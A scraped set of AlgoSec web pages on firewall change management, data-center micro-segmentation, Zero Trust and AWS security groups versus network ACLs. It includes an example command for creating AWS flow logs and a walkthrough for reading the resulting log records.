in place beyond their active date. This step forces you to review why policies are in place, enabling you to improve documentation and to remove or tweak rules to align with the business. In some cases (e.g., data breach) a change to a firewall rule set must be made immediately, where, even with all the automation in the world, there is no time to go through the 10 steps. To address this type of situation, an emergency process should be defined and documented. Schedule a Demo Key capabiities to look for in a firewall change management solution Your workflow system must be firewall- and network-aware. This allows the system to gather the proper intelligence by pulling the configuration information from the firewalls to understand the current policies. Ultimately, this reduces the time it takes to complete many of the steps within the change process. In contrast, a general change management system will not have this integration and thus will provide no domain-specific expertise when it comes to making firewall rule changes. Your solution must support all of the firewalls and routers used within your organization. With the evolution of next-generation firewalls and new cloud devices, you should also consider how your plans fit into your firewall change-management decisions. In larger organizations, there are typically many firewalls from different vendors. If your solution cannot support all the devices in the environment (current and future), then this isn’t the solution for you! Your solution must be topology-aware. The solution must:Understand how the network is laid out Comprehend how the devices fit and interact Provide the necessary visibility of how traffic is flowing through the network Your solution must integrate with the existing general change management systems. This is important so that you can maximize the return on previously made investments. You don’t want to undergo a massive retraining on processes and systems simply because you have introduced a new solution. This integration allows users to continue using their familiar systems, but with the added intelligence from having that firewall-aware visibility and understanding that the new solution delivers. Your solution must provide out-of-the-box change workflows to streamline change-management processes as well as be highly customizable since no two organizations’ network and change processes are exactly the same. Key workflow capabilities to look for in a solution:Provide out-of-the-box change workflows to help you quickly tackle common change-request scenarios Offer the ability to tailor the change process to your unique business needs by: Creating request templates that define the information required to start a change process and pre-populate information where possible Enabling parallel approval steps within the workflow — ideal when multiple approvals are required to process a change Influencing the workflow according to dynamic information obtained during ticket processing (e.g., risk level, affected firewalls, urgency, ) Ensuring accountability and increasing corporate governance with logic that routes change requests to specific roles throughout the workflow Identify which firewalls and rules block requested traffic Detect and filter unneeded/redundant requests for traffic that is already permitted Provide “what-if” risk-analysis to ensure compliance with regulations and policies Automatically produce detailed work orders, indicating which new or existing rules to add or edit and which objects to create or reuse Prevent unauthorized changes by automatically matching detected policy changes with request tickets and reporting on mismatches Ensure that change requests have actually been implemented on the network, preventing premature closing of tickets Schedule a Demo Out-of-the-box workflow examples The best solutions allow for: Adding new rules via a wizard-driven request process and flow that includes impact analysis, change validation and audit Changing rules and objects by easily defining the requests for creation, modification and deletion, and identifying rules affected by suggested object modifications for best impact analysis Removing rules by automatically retrieving a list of change requests related to the rule-removal request, notifying all requestors of the impending change, managing the approval process, documenting and validating removal Recertifying rules by automatically presenting all tickets with deadlines to the responsible party for recertification or rejection and maintaining a full audit trail with actionable reporting Quantifying the ROI on firewall change-control automation Schedule a Demo Cut your costs Manual firewall change management is a time-consuming and error-prone process. Consider a typical change order that requires a total of four hours of work by several team members during the change lifecycle, including communication, validation, risk assessment, planning and design, execution, verification, documentation, auditing and measurement. Based on these assumptions, AlgoSec customers have reported significant cost savings (as much as 60%) achieved through: Reduction of 50% in processing time using automation Elimination of 30% of unnecessary changes Elimination of 8% of changes that are reopened due to incorrect implementation Schedule a Demo Summary While change management is complex stuff, the decision for your business is actually simple. You can continue to slowly chug along with manual change management processes that drain your IT resources and impede agility. Or you can accelerate your processes with an automated network change- management workflow solution that aligns the different stakeholders involved in the process (network operations, network security, compliance, business owners, etc.) and helps the business run more smoothly. Think of your change process as a key component of the engine of an expensive car (in this case, your organization). Would you drive your car at high speed if you didn’t have tested, dependable brakes or a steering wheel? Hopefully, the answer is no! The brakes and steering wheel are analogous to change controls and processes. Rather than slowing you down, they actually make you go faster, securely! Power steering and power brakes (in this case, firewall-aware integration and automation) help you zoom to success. Let's start your journey to our business-centric network Schedule a Demo Select a size Overview Introduction Why is it so hard to make changes to network policies? Mind the gap? Not if you want a good change management process Real-life examples of good changes gone bad Taking the fire drill out of firewall changes 10 steps to automating and standardizing the firewall change-management process Key capabiities to look for in a firewall change management solution Out-of-the-box workflow examples Cut your costs Summary Get the latest insights from the experts Choose a better way to manage your network
- Micro-segmentation from strategy to execution | AlgoSec
Implement micro-segmentation effectively, from strategy to execution, to enhance security, minimize risks, and protect critical assets across your network. Micro-segmentation from strategy to execution Overview Learn how to plan and execute your micro-segmentation project in AlgoSec’s guide. Schedule a Demo What is Micro segmentation Micro-segmentation is a technique to create secure zones in networks. It lets companies isolate workloads from one another and introduce tight controls over internal access to sensitive data. This makes network security more granular. Micro-segmentation is an “upgrade” to network segmentation. Companies have long relied on firewalls, VLANs, and access control lists (ACL) to segment their network. Network segmentation is a key defense-in-depth strategy, segregating and protecting company data and limiting attackers’ lateral movements. Consider a physical intruder who enters a gated community. Despite having breached the gate, the intruder cannot freely enter the houses in the community because, in addition to the outside gate, each house has locks on its door. Micro-segmentation takes this an additional step further – even if the intruder breaks into a house, the intruder cannot access all the rooms. Schedule a Demo Why Micro-segment? Organizations frequently implement micro-segmentation to block lateral movement. Two common types of lateral movements are insider threats and ransomware. Insider threats are employees or contractors gaining access to data that they are not authorized to access. Ransomware is a type of malware attack in which the attacker locks and encrypts the victim’s data and then demands a payment to unlock and decrypt the data. If an attacker takes over one desktop or one server in your estate and deploys malware, you want to reduce the “blast radius” and make sure that the malware can’t spread throughout the entire data center. And if you decide not to pay the ransom? Datto’s Global State of the Channel Ransomware Report informs us that: The cost of downtime is 23x greater than the average ransom requested in 2019. Downtime costs due to ransomware are up by 200% year-over-year. Schedule a Demo The SDN Solution With software-defined networks, such as Cisco ACI and VMware NSX, micro-segmentation can be achieved without deploying additional controls such as firewalls. Because the data center is software-driven, the fabric has built-in filtering capabilities. This means that you can introduce policy rules without adding new hardware. SDN solutions can filter flows both inside the data center (east-west traffic) and flows entering or exiting the data center (north-south traffic). The SDN technology supporting your data center eliminates many of the earlier barriers to micro-segmentation. Yet, although a software-defined fabric makes segmentation possible, there are still many challenges to making it a reality. Schedule a Demo What is a Good Filtering Policy A good filtering policy has three requirements: 1 – Allows all business traffic The last thing you want is to write a micro-segmented policy and have it break necessary business communication, causing applications to stop functioning. 2 – Allows nothing else By default, all other traffic should be denied. 3 – Future-proof “More of the same” changes in the network environment shouldn’t break rules. If you write your policies too narrowly, then any change in the network, such as a new server or application, could cause something to stop working. Write with scalability in mind. How do organizations achieve these requirements? They need to know what the traffic flows are as well as what should be allowed and what should be denied. This is difficult because most traffic is undocumented. There is no clear record of the applications in the data center and what network flows they depend on. To get accurate information, you need to perform a “discovery” process. Schedule a Demo A Blueprint for Creating a Micro-segmentation Policy Micro-segmentation Blueprint Discovery You need to find out which traffic needs to be allowed and then you can decide what not to allow. Two common ways to implement a discovery process are traffic-based discovery and content-based discovery. Traffic-Based Discovery Traffic-based discovery is the process of understanding traffic flows: Observe the traffic that is traversing the data center, analyze it, and identify the intent of the flows by mapping them to the applications they support. You can collect the raw traffic with a traffic sniffer/network TAP or use a NetFlow feed. Content-based or Data-Based Approach In the content-based approach, you organize the data center systems into segments based on the sensitivity of the data they process. For example, an eCommerce application may process credit card information which is regulated by the PCI DSS standard. Therefore, you need to identify the servers supporting the eCommerce application and separate them in your filtering policy. Discovering traffic flows within a data center Micro-segmentation Blueprint Using NetFlow for Traffic Mapping The traffic source on which it is easiest to base application discovery is NetFlow. Most routers and switches can be configured to emit a NetFlow feed without requiring the deployment of agents throughout the data center. The flows in the NetFlow feed are clustered into business applications based on recurring IP addresses and correlations in time. For example, if an HTTPS connection from a client at 172.7.1.11 to 10.3.3.3 is observed at 10 AM, and a PostgreSQL connection from the same 10.3.3.3 to 10.1.1.1 is observed 0.5 seconds later, it’s clear that all three systems support a single application, which can be labeled with a name such as “Trading System”. 172.7.1.0/2410.3.3.3 TRADE SYS HTTPS10.3.3.3 TRADE SYS 10.1.1.11 DB TCP/543210.3.3.7 FOREX 10.1.1.11 DB TCP/5432 Identifying traffic flows in common, based on shared IP addresses NetFlow often produces thousands of “thin flow” records (one IP to another IP), even for a single application. In the example above, there may be a NetFlow record for every client desktop. It is important to aggregate them into “fat flows” (e.g., that allows all the clients in the 172.7.1.0/24 range). In addition to avoiding an explosion in the number of flows, aggregation also provides a higher-level understanding, as well as future-proofing the policies against fluctuations in IP address allocation. Using the discovery platform in the AlgoSec Security Management Suite to identify the flows in combination with information from your firewalls can help you decide where to put the boundaries of your segments and which policies to put in these filters. Micro-segmentation Blueprint Defining Logical Segments Once you have discovered the business applications whose traffic is traversing the data center (using traffic-based discovery) and have also identified the data sensitivity (using a content-based approach) you are well positioned to define your segments. Bear in mind that all the traffic that is confined to a segment is allowed. Traffic crossing between segments is blocked by default – and needs to be explicitly allowed by a policy rule. There are two potential starting points: Segregate the systems processing sensitive data into their own segments. You may have to do this anyway for regulatory reasons. Segregate networks connecting to client systems (desktops, laptops, wireless networks) into “human-zone” segments. Client systems are often the entry points of malware, and are always the source of malicious insider attacks. Then, place the remaining servers supporting each application, each in its own segment. Doing so will save you the need to write explicit policy rules to allow traffic that is internal to only one business application. Example segment within a data center Micro-segmentation Blueprint Creating the Filtering Policy Once the segments are defined, we need to write the policy. Traffic confined to a segment is automatically allowed so we don’t need to worry about it anymore. We just need to write policy for traffic crossing micro-segment boundaries. Eventually, the last rule on the policy must be a default-deny: “from anywhere to anywhere, with any service – DENY.” However, enforcing such a rule in the early days of the micro-segmentation project, before all the rest of the policy is written, risks breaking many applications’ communications. So start with a (totally insecure) default-allow rule until your policy is ready, and then switch to a default-deny on “D-Day” (“deny-day”). We’ll discuss D-Day shortly. What types of rules are we going to be writing? Cross segment flows – Allowing traffic between segments: e.g., Allow the eCommerce servers to access the credit-card Flows to/from outside the data center – e.g., allow employees in the finance department to connect to financial data within the data center from their machines in the human-zone, or allow access from the Internet to the front-end eCommerce web servers. Users outside the data center need to access data within the data center Micro-segmentation Blueprint Default Allow – with Logging To avoid major connectivity disruptions, start your micro-segmentation project gently. Instead of writing a “DENY” rule at the end of the policy, write an “ALLOW” rule – which is clearly insecure – but turn on logging for this ALLOW rule. This creates a log of all connections that match the default-allow rule. Initially you will receive many logs entries from the default-allow rule; your goal in the project is to eliminate them. To do this, you go over the applications you discovered earlier, write the policy rules that support each application’s cross-segment flows, and place them above the default-allow rule. This means that the traffic of each application you handle will no longer match the default-allow (it will match the new rules you wrote) – and the amount of default-allow logs will decrease. Keep adding rules, application by application, until the final allow rule is not generating any more logs. At that point, you reach the final milestone in the project: D-Day. Micro-segmentation Blueprint Preparing for “D-Day” Once logging generated by the default-allow rule ceases to indicate new flows that need to be added to your filtering policy, you can start preparing for “D-Day.” This is the day that you flip the switch and change the final rule from “default ALLOW” to “default DENY.” Once you do that, all the undiscovered traffic is going to be denied by the filtering fabric, and you will finally have a secured, micro-segmented, data center. This is a big deal! However, you should realize that D-Day is going to cause a big organizational change. From this day forward, every application developer whose application requires new traffic to cross the data center will need to ask for permission to allow this traffic; they will need to follow a process, which includes opening a change request, and then wait for the change to be implemented. The free-wheeling days are over. You need to prepare for D-Day. Consider steps such as: Get management buy-in Communicate the change across the organization Set a change control window Have “all hands on deck” on D-Day to quickly correct anything that may have been missed and causes applications to break Micro-segmentation Blueprint Change Requests & Compliance Notice that after D-Day, any change in application connectivity requires filing a “change request”. When the information security team is evaluating a change request – they need to check whether the request is in line with the “acceptable traffic” policy. A common method for managing policy at the high-level is to use a table, where each row represents a segment, and every column represents a segment. Each cell in the table lists all the services that are allowed from its “row” segment to its “column” segment. Keeping this table in a machine readable format, such an Excel spreadsheet, enables software systems to run a what-if risk-check that compares each change-request with the acceptable policy, and flags any discrepancies before the new rules are deployed. Such a what-if risk-check is also important for regulatory compliance. Regulations such as PCI and ISO27001 require organizations to define such a policy, and to compare themselves to it; demonstrating the policy is often part of the certification or audit. Schedule a Demo Enabling Micro-segmentation with AlgoSec The AlgoSec Security Management Suite (ASMS) makes it easy to define and enforce your micro-segmentation strategy inside the data center, ensuring that it does not block critical business services and does meet compliance requirements. AlgoSec’s powerful AutoDiscovery capabilities help you understand the network flows in your organization. You can automatically connect the recognized traffic flows to the business applications that use them. Once the segments are established, AlgoSec seamlessly manages the network security policy across your entire hybrid network estate. AlgoSec proactively checks every proposed firewall rule change request against the segmentation strategy to ensure that the change doesn’t break the segmentation strategy, introduce risk, or violate compliance requirements. AlgoSec enforces micro-segmentation by: Generating a custom report on compliance enforced by the micro-segmentation policy Identifying unprotected network flows that do not cross any firewall and are not filtered for an application Automatically identifying changes that violate the micro-segmentation strategy Automatically implementing network security changes Automatically validating changes Security zones in AlgoSec’s AppViz Want to learn more? Get a personal demo Schedule a Demo About AlgoSec AlgoSec, a global cybersecurity leader, empowers organizations to secure application connectivity by automating connectivity flows and security policy, anywhere. The AlgoSec platform enables the world’s most complex organizations to gain visibility, reduce risk and process changes at zero-touch across the hybrid network. AlgoSec’s patented application-centric view of the hybrid network enables business owners, application owners, and information security professionals to talk the same language, so organizations can deliver business applications faster while achieving a heightened security posture. Over 1,800 of the world’s leading organizations trust AlgoSec to help secure their most critical workloads across public cloud, private cloud, containers, and on-premises networks, while taking advantage of almost two decades of leadership in Network Security Policy Management. See what securely accelerating your digital transformation, move-to-cloud, infrastructure modernization, or micro-segmentation initiatives looks like at www.algosec.com Want to learn more about how AlgoSec can help enable micro-segmentation? Schedule a demo. Schedule a Demo Select a size Overview What is Micro segmentation Why Micro-segment? The SDN Solution What is a Good Filtering Policy A Blueprint for Creating a Micro-segmentation Policy Enabling Micro-segmentation with AlgoSec About AlgoSec Get the latest insights from the experts Choose a better way to manage your network
- AlgoSec application discovery Enhance the discovery of your network applications | AlgoSec
Streamline network management with AlgoSec Application Discovery. Gain visibility into application connectivity to optimize performance and enhance security policies. AlgoSec application discovery Enhance the discovery of your network applications ---- ------- Schedule a Demo Select a size ----- Get the latest insights from the experts Choose a better way to manage your network
- Master the Zero Trust strategy for improved cybersecurity | AlgoSec
Learn best practices to secure your cloud environment and deliver applications securely Webinars Master the Zero Trust strategy for improved cybersecurity Learn how to implement zero trust security into your business In today’s digital world, cyber threats are becoming more complex and sophisticated. Businesses must adopt a proactive approach to cybersecurity to protect their sensitive data and systems. This is where zero trust security comes in – a security model that requires every user, device, and application to be verified before granting access. If you’re looking to implement zero trust security in your business or want to know more about how it works, you’ll want to watch this webinar. AlgoSec co-Founder and CTO Avishai Wool will discuss the benefits of zero trust security and provide you with practical tips on how to implement this security model in your organization. March 15, 2023 Prof. Avishai Wool CTO & Co Founder AlgoSec Relevant resources Protecting Your Network’s Precious Jewels with Micro-Segmentation, Kyle Wickert, AlgoSec Watch Video Professor Wool - Introduction to Microsegmentation Watch Video Five Practical Steps to Implementing a Zero-Trust Network Keep Reading Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue
- AlgoSec | NACL best practices: How to combine security groups with network ACLs effectively
Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure... AWS NACL best practices: How to combine security groups with network ACLs effectively Prof. Avishai Wool 2 min read Prof. Avishai Wool Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/28/23 Published Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure infrastructure for Amazon Web Services, while AWS users are responsible for maintaining secure configurations. That requires using multiple AWS services and tools to manage traffic. You’ll need to develop a set of inbound rules for incoming connections between your Amazon Virtual Private Cloud (VPC) and all of its Elastic Compute (EC2) instances and the rest of the Internet. You’ll also need to manage outbound traffic with a series of outbound rules. Your Amazon VPC provides you with several tools to do this. The two most important ones are security groups and Network Access Control Lists (NACLs). Security groups are stateful firewalls that secure inbound traffic for individual EC2 instances. Network ACLs are stateless firewalls that secure inbound and outbound traffic for VPC subnets. Managing AWS VPC security requires configuring both of these tools appropriately for your unique security risk profile. This means planning your security architecture carefully to align it the rest of your security framework. For example, your firewall rules impact the way Amazon Identity Access Management (IAM) handles user permissions. Some (but not all) IAM features can be implemented at the network firewall layer of security. Before you can manage AWS network security effectively , you must familiarize yourself with how AWS security tools work and what sets them apart. Everything you need to know about security groups vs NACLs AWS security groups explained: Every AWS account has a single default security group assigned to the default VPC in every Region. It is configured to allow inbound traffic from network interfaces assigned to the same group, using any protocol and any port. It also allows all outbound traffic using any protocol and any port. Your default security group will also allow all outbound IPv6 traffic once your VPC is associated with an IPv6 CIDR block. You can’t delete the default security group, but you can create new security groups and assign them to AWS EC2 instances. Each security group can only contain up to 60 rules, but you can set up to 2500 security groups per Region. You can associate many different security groups to a single instance, potentially combining hundreds of rules. These are all allow rules that allow traffic to flow according the ports and protocols specified. For example, you might set up a rule that authorizes inbound traffic over IPv6 for linux SSH commands and sends it to a specific destination. This could be different from the destination you set for other TCP traffic. Security groups are stateful, which means that requests sent from your instance will be allowed to flow regardless of inbound traffic rules. Similarly, VPC security groups automatically responses to inbound traffic to flow out regardless of outbound rules. However, since security groups do not support deny rules, you can’t use them to block a specific IP address from connecting with your EC2 instance. Be aware that Amazon EC2 automatically blocks email traffic on port 25 by default – but this is not included as a specific rule in your default security group. AWS NACLs explained: Your VPC comes with a default NACL configured to automatically allow all inbound and outbound network traffic. Unlike security groups, NACLs filter traffic at the subnet level. That means that Network ACL rules apply to every EC2 instance in the subnet, allowing users to manage AWS resources more efficiently. Every subnet in your VPC must be associated with a Network ACL. Any single Network ACL can be associated with multiple subnets, but each subnet can only be assigned to one Network ACL at a time. Every rule has its own rule number, and Amazon evaluates rules in ascending order. The most important characteristic of NACL rules is that they can deny traffic. Amazon evaluates these rules when traffic enters or leaves the subnet – not while it moves within the subnet. You can access more granular data on data flows using VPC flow logs. Since Amazon evaluates NACL rules in ascending order, make sure that you place deny rules earlier in the table than rules that allow traffic to multiple ports. You will also have to create specific rules for IPv4 and IPv6 traffic – AWS treats these as two distinct types of traffic, so rules that apply to one do not automatically apply to the other. Once you start customizing NACLs, you will have to take into account the way they interact with other AWS services. For example, Elastic Load Balancing won’t work if your NACL contains a deny rule excluding traffic from 0.0.0.0/0 or the subnet’s CIDR. You should create specific inclusions for services like Elastic Load Balancing, AWS Lambda, and AWS CloudWatch. You may need to set up specific inclusions for third-party APIs, as well. You can create these inclusions by specifying ephemeral port ranges that correspond to the services you want to allow. For example, NAT gateways use ports 1024 to 65535. This is the same range covered by AWS Lambda functions, but it’s different than the range used by Windows operating systems. When creating these rules, remember that unlike security groups, NACLs are stateless. That means that when responses to allowed traffic are generated, those responses are subject to NACL rules. Misconfigured NACLs deny traffic responses that should be allowed, leading to errors, reduced visibility, and potential security vulnerabilities . How to configure and map NACL associations A major part of optimizing NACL architecture involves mapping the associations between security groups and NACLs. Ideally, you want to enforce a specific set of rules at the subnet level using NACLs, and a different set of instance-specific rules at the security group level. Keeping these rulesets separate will prevent you from setting inconsistent rules and accidentally causing unpredictable performance problems. The first step in mapping NACL associations is using the Amazon VPC console to find out which NACL is associated with a particular subnet. Since NACLs can be associated with multiple subnets, you will want to create a comprehensive list of every association and the rules they contain. To find out which NACL is associated with a subnet: Open the Amazon VPC console . Select Subnets in the navigation pane. Select the subnet you want to inspect. The Network ACL tab will display the ID of the ACL associated with that network, and the rules it contains. To find out which subnets are associated with a NACL: Open the Amazon VPC console . Select Network ACLS in the navigation pane. Click over to the column entitled Associated With. Select a Network ACL from the list. Look for Subnet associations on the details pane and click on it. The pane will show you all subnets associated with the selected Network ACL. Now that you know how the difference between security groups and NACLs and you can map the associations between your subnets and NACLs, you’re ready to implement some security best practices that will help you strengthen and simplify your network architecture. 5 best practices for AWS NACL management Pay close attention to default NACLs, especially at the beginning Since every VPC comes with a default NACL, many AWS users jump straight into configuring their VPC and creating subnets, leaving NACL configuration for later. The problem here is that every subnet associated with your VPC will inherit the default NACL. This allows all traffic to flow into and out of the network. Going back and building a working security policy framework will be difficult and complicated – especially if adjustments are still being made to your subnet-level architecture. Taking time to create custom NACLs and assign them to the appropriate subnets as you go will make it much easier to keep track of changes to your security posture as you modify your VPC moving forward. Implement a two-tiered system where NACLs and security groups complement one another Security groups and NACLs are designed to complement one another, yet not every AWS VPC user configures their security policies accordingly. Mapping out your assets can help you identify exactly what kind of rules need to be put in place, and may help you determine which tool is the best one for each particular case. For example, imagine you have a two-tiered web application with web servers in one security group and a database in another. You could establish inbound NACL rules that allow external connections to your web servers from anywhere in the world (enabling port 443 connections) while strictly limiting access to your database (by only allowing port 3306 connections for MySQL). Look out for ineffective, redundant, and misconfigured deny rules Amazon recommends placing deny rules first in the sequential list of rules that your NACL enforces. Since you’re likely to enforce multiple deny rules per NACL (and multiple NACLs throughout your VPC), you’ll want to pay close attention to the order of those rules, looking for conflicts and misconfigurations that will impact your security posture. Similarly, you should pay close attention to the way security group rules interact with your NACLs. Even misconfigurations that are harmless from a security perspective may end up impacting the performance of your instance, or causing other problems. Regularly reviewing your rules is a good way to prevent these mistakes from occurring. Limit outbound traffic to the required ports or port ranges When creating a new NACL, you have the ability to apply inbound or outbound restrictions. There may be cases where you want to set outbound rules that allow traffic from all ports. Be careful, though. This may introduce vulnerabilities into your security posture. It’s better to limit access to the required ports, or to specify the corresponding port range for outbound rules. This establishes the principle of least privilege to outbound traffic and limits the risk of unauthorized access that may occur at the subnet level. Test your security posture frequently and verify the results How do you know if your particular combination of security groups and NACLs is optimal? Testing your architecture is a vital step towards making sure you haven’t left out any glaring vulnerabilities. It also gives you a good opportunity to address misconfiguration risks. This doesn’t always mean actively running penetration tests with experienced red team consultants, although that’s a valuable way to ensure best-in-class security. It also means taking time to validate your rules by running small tests with an external device. Consider using AWS flow logs to trace the way your rules direct traffic and using that data to improve your work. How to diagnose security group rules and NACL rules with flow logs Flow logs allow you to verify whether your firewall rules follow security best practices effectively. You can follow data ingress and egress and observe how data interacts with your AWS security rule architecture at each step along the way. This gives you clear visibility into how efficient your route tables are, and may help you configure your internet gateways for optimal performance. Before you can use the Flow Log CLI, you will need to create an IAM role that includes a policy granting users the permission to create, configure, and delete flow logs. Flow logs are available at three distinct levels, each accessible through its own console: Network interfaces VPCs Subnets You can use the ping command from an external device to test the way your instance’s security group and NACLs interact. Your security group rules (which are stateful) will allow the response ping from your instance to go through. Your NACL rules (which are stateless) will not allow the outbound ping response to travel back to your device. You can look for this activity through a flow log query. Here is a quick tutorial on how to create a flow log query to check your AWS security policies. First you’ll need to create a flow log in the AWS CLI. This is an example of a flow log query that captures all rejected traffic for a specified network interface. It delivers the flow logs to a CloudWatch log group with permissions specified in the IAM role: aws ec2 create-flow-logs \ –resource-type NetworkInterface \ –resource-ids eni-1235b8ca123456789 \ –traffic-type ALL \ –log-group-name my-flow-logs \ –deliver-logs-permission-arn arn:aws:iam::123456789101:role/publishFlowLogs Assuming your test pings represent the only traffic flowing between your external device and EC2 instance, you’ll get two records that look like this: 2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK 2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK To parse this data, you’ll need to familiarize yourself with flow log syntax. Default flow log records contain 14 arguments, although you can also expand custom queries to return more than double that number: Version tells you the version currently in use. Default flow logs requests use Version 2. Expanded custom requests may use Version 3 or 4. Account-id tells you the account ID of the owner of the network interface that traffic is traveling through. The record may display as unknown if the network interface is part of an AWS service like a Network Load Balancer. Interface-id shows the unique ID of the network interface for the traffic currently under inspection. Srcaddr shows the source of incoming traffic, or the address of the network interface for outgoing traffic. In the case of IPv4 addresses for network interfaces, it is always its private IPv4 address. Dstaddr shows the destination of outgoing traffic, or the address of the network interface for incoming traffic. In the case of IPv4 addresses for network interfaces, it is always its private IPv4 address. Srcport is the source port for the traffic under inspection. Dstport is the destination port for the traffic under inspection. Protocol refers to the corresponding IANA traffic protocol number . Packets describes the number of packets transferred. Bytes describes the number of bytes transferred. Start shows the start time when the first data packet was received. This could be up to one minute after the network interface transmitted or received the packet. End shows the time when the last data packet was received. This can be up to one minutes after the network interface transmitted or received the data packet. Action describes what happened to the traffic under inspection: ACCEPT means that traffic was allowed to pass. REJECT means the traffic was blocked, typically by security groups or NACLs. Log-status confirms the status of the flow log: OK means data is logging normally. NODATA means no network traffic to or from the network interface was detected during the specified interval. SKIPDATA means some flow log records are missing, usually due to internal capacity restraints or other errors. Going back to the example above, the flow log output shows that a user sent a command from a device with the IP address 203.0.113.12 to the network interface’s private IP address, which is 172.31.16.139. The security group’s inbound rules allowed the ICMP traffic to travel through, producing an ACCEPT record. However, the NACL did not let the ping response go through, because it is stateless. This generated the REJECT record that followed immediately after. If you configure your NACL to permit output ICMP traffic and run this test again, the second flow log record will change to ACCEPT. azon Web Services (AWS) is one of the most popular options for organizations looking to migrate their business applications to the cloud. It’s easy to see why: AWS offers high capacity, scalable and cost-effective storage, and a flexible, shared responsibility approach to security. Essentially, AWS secures the infrastructure, and you secure whatever you run on that infrastructure. However, this model does throw up some challenges. What exactly do you have control over? How can you customize your AWS infrastructure so that it isn’t just secure today, but will continue delivering robust, easily managed security in the future? The basics: security groups AWS offers virtual firewalls to organizations, for filtering traffic that crosses their cloud network segments. The AWS firewalls are managed using a concept called Security Groups. These are the policies, or lists of security rules, applied to an instance – a virtualized computer in the AWS estate. AWS Security Groups are not identical to traditional firewalls, and they have some unique characteristics and functionality that you should be aware of, and we’ve discussed them in detail in video lesson 1: the fundamentals of AWS Security Groups , but the crucial points to be aware of are as follows. First, security groups do not deny traffic – that is, all the rules in security groups are positive, and allow traffic. Second, while security group rules can be set to specify a traffic source, or a destination, they cannot specify both on the same rule. This is because AWS always sets the unspecified side (source or destination) as the instance to which the group is applied. Finally, single security groups can be applied to multiple instances, or multiple security groups can be applied to a single instance: AWS is very flexible. This flexibility is one of the unique benefits of AWS, allowing organizations to build bespoke security policies across different functions and even operating systems, mixing and matching them to suit their needs. Adding Network ACLs into the mix To further enhance and enrich its security filtering capabilities AWS also offers a feature called Network Access Control Lists (NACLs). Like security groups, each NACL is a list of rules, but there are two important differences between NACLs and security groups. The first difference is that NACLs are not directly tied to instances, but are tied with the subnet within your AWS virtual private cloud that contains the relevant instance. This means that the rules in a NACL apply to all of the instances within the subnet, in addition to all the rules from the security groups. So a specific instance inherits all the rules from the security groups associated with it, plus the rules associated with a NACL which is optionally associated with a subnet containing that instance. As a result NACLs have a broader reach, and affect more instances than a security group does. The second difference is that NACLs can be written to include an explicit action, so you can write ‘deny’ rules – for example to block traffic from a particular set of IP addresses which are known to be compromised. The ability to write ‘deny’ actions is a crucial part of NACL functionality. It’s all about the order As a consequence, when you have the ability to write both ‘allow’ rules and ‘deny’ rules, the order of the rules now becomes important. If you switch the order of the rules between a ‘deny’ and ‘allow’ rule, then you’re potentially changing your filtering policy quite dramatically. To manage this, AWS uses the concept of a ‘rule number’ within each NACL. By specifying the rule number, you can identify the correct order of the rules for your needs. You can choose which traffic you deny at the outset, and which you then actively allow. As such, with NACLs you can manage security tasks in a way that you cannot do with security groups alone. However, we did point out earlier that an instance inherits security rules from both the security groups, and from the NACLs – so how do these interact? The order by which rules are evaluated is this; For inbound traffic, AWS’s infrastructure first assesses the NACL rules. If traffic gets through the NACL, then all the security groups that are associated with that specific instance are evaluated, and the order in which this happens within and among the security groups is unimportant because they are all ‘allow’ rules. For outbound traffic, this order is reversed: the traffic is first evaluated against the security groups, and then finally against the NACL that is associated with the relevant subnet. You can see me explain this topic in person in my new whiteboard video: Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call




